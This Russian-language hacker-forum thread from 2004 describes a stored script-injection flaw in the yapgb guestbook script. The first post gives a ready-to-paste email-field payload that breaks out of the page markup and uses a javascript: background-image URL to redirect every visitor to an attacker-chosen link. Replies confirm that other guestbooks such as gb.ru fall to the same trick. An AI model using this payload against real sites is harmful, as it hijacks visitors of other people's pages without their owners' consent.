Уязвимость гостевой книги  yapgb

Discussion in 'Уязвимости' started by Егорыч+++, 14 May 2004.

  1. Егорыч+++

    Staff Member

    Joined:
    27 May 2002
    Messages:
    1,373
    Likes Received:
    895
    Reputations:
    20
    Эта гостевая не пропускает " ' ,а также не пропускает < >.
    Но тем неменее редирекс сделать можно. Для этого отсчитываем какая ссылка по счету у нас будет в homepage.
    потом в поле почты вставляем следующий код:

    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">[email protected]" style=background-image:url(javascript:navigate(document.links[7].href));[/QUOTE]<span id='postcolor'>

    в поле HOMEPAGE адрес нашей странички http://antichat.ru

    Здесь 7 - это порядковый на страничке (если не получается посчитать можно угадать)

    ПОсле чего получаем редирект на АНТИЧАТ

    Официальный сайт гостевой http://www.hewop.com/~yapgb/ - но там в демоверсии какой то глюк и они подменяют все точки и разные символы.. из за чего у них ссылки неправильно отображаются. Зато уязвимость есть во всем остальных гостевых найденных в интернете.
     
  2. JazzzSummerMan

    Joined:
    7 Apr 2004
    Messages:
    374
    Likes Received:
    18
    Reputations:
    14
    Вот это то что нужно! Многие гостевые можно взломать только таким способом( через htmtl рассматривая ясен), например gb.ru, по мойму то же самое)
     
  3. Егорыч+++

    Staff Member

    Joined:
    27 May 2002
    Messages:
    1,373
    Likes Received:
    895
    Reputations:
    20
    JazzzSummerMan - поздравляю.. gb.ru действительно так ломается
     
  4. Егорыч+++

    Staff Member

    Joined:
    27 May 2002
    Messages:
    1,373
    Likes Received:
    895
    Reputations:
    20
    кавычки экранируются...